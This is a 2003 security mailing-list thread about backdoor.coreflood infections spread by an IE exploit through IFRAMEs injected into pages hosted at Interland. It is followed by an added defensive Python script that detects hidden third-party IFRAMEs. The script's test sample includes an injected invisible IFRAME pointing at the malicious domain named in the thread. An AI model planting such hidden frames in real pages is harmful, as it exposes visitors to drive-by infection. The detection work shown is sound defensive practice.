Re: Backdoor.coreflood infection

From: Jack McCarthy (lists_at_jackmccarthy.com)
Date: Fri, 5 Sep 2003 10:53:25 -0700 (PDT)
To: incidents@securityfocus.com


    Well, now that makes sense. My site is hosted by Interland and I saw strange
    traffic going to beech-info2.com when loading my page. I had about 10 other
    things on my plate at that time, so I didn't spend much time on it. We ended
    up having 2 infected machines, my box and our Citrix box, which I also use.
    Symantec corp edition found it (after the Sept 3 update) as backdoor.coreflood
    and deleted it. Any official postings/memos/news articles regarding this
    exploit on Interland's servers?

    -Jack

    --- Joe Stewart <jstewart@lurhq.com> wrote:
    > On Thursday 04 September 2003 02:05 pm, Reid Forrest wrote:
    > > We've had three machines across multiple sites come up
    > > with the backdoor.coreflood trojan today. NAV caught
    > > them all, but I'm wondering how it got in. We block
    > > .exe attachments.
    > >
    > > It's my understanding that this thing doesn't
    > > propagate itself. One instance I can understand, but
    > > three seemingly unrelated infections are puzzling.
    > >
    > > Is anyone else seeing this, or have any ideas?
    >
    > It sounds like your users visited a site hosted at Interland last week
    > and were hit by the IE exploit a hacker appended to the pages in an
    > IFRAME. The description as backdoor.coreflood is misleading; the
    > trojan you found was probably a proxy server, not an IRC bot. The
    > proxy server shares a lot of base code with the coreflood IRC bot
    > and uses the same style of DLL injection, but the functionality is
    > completely different.
    >
    > -Joe
    >
    > --
    > Joe Stewart, GCIH
    > Senior Security Researcher
    > LURHQ Corporation
    > http://www.lurhq.com/
    >
    >
    > ---------------------------------------------------------------------------
    > Attend Black Hat Briefings & Training Federal, September 29-30 (Training),
    > October 1-2 (Briefings) in Tysons Corner, VA; the world's premier
    > technical IT security event. Modeled after the famous Black Hat event in
    > Las Vegas! 6 tracks, 12 training sessions, top speakers and sponsors.
    > Symantec is the Diamond sponsor. Early-bird registration ends September
    > 6.Visit us: www.blackhat.com
    > ----------------------------------------------------------------------------

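Joe's reply above describes the infection path: an IFRAME appended to pages on the compromised host, pulling in an IE exploit from a third-party domain, which matches the unexpected traffic to beech-info2.com that Jack saw when loading his own page. As an added example (not code from this thread or from any of the posters), the Python below scans a page's HTML for IFRAMEs whose source host is neither the site itself nor an allowlisted partner and flags those sized or styled to be invisible. The sample page, the site hostname example.com and the allowlist parameter are constructed for the demonstration; beech-info2.com appears only because it is the domain named in the thread.

```python
# Added example: scan served HTML for injected third-party IFRAMEs.
# Not code from this thread; sample page, site host and allowlist are constructed.
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the src of every <iframe>/<frame>, noting whether the element
    is sized or styled so that a user would never see it."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "frame"):
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "").strip()
        if not src:
            return
        width, height = a.get("width", "").strip(), a.get("height", "").strip()
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (
            width in ("0", "1") or height in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style
        )
        self.frames.append({"src": src, "hidden": hidden, "line": self.getpos()[0]})


def find_foreign_iframes(html, site_host, allowed_hosts=()):
    """Return frames whose src points at a host that is neither the site
    itself nor in allowed_hosts. Relative src values are same-origin and
    are skipped."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    allowed = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    foreign = []
    for frame in parser.frames:
        host = (urlparse(frame["src"]).hostname or "").lower()
        if host and host not in allowed:
            foreign.append({**frame, "host": host})
    return foreign


# Constructed sample: a normal page with a hidden IFRAME appended after </html>,
# the pattern described in the thread (the domain is the one Jack saw traffic to).
SAMPLE_PAGE = """<html><head><title>Example Co</title></head>
<body>
<iframe src="/nav.html" width="200" height="400"></iframe>
<iframe src="https://example.com/widget" width="300" height="100"></iframe>
<p>Welcome to our site.</p>
</body></html>
<iframe src="http://beech-info2.com/" width=0 height=0 style="display: none"></iframe>
"""

if __name__ == "__main__":
    for f in find_foreign_iframes(SAMPLE_PAGE, "example.com"):
        flag = "HIDDEN" if f["hidden"] else "visible"
        print(f"line {f['line']}: {flag} iframe -> {f['host']} ({f['src']})")
```

Run against the HTML actually served by the host (fetched with a client, not read from the deployment source) so that content appended on the server shows up; a hidden frame to a host you never configured, especially one placed after the closing tags, is the signal to compare the served page with what was deployed and to check the hosting account for tampering.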

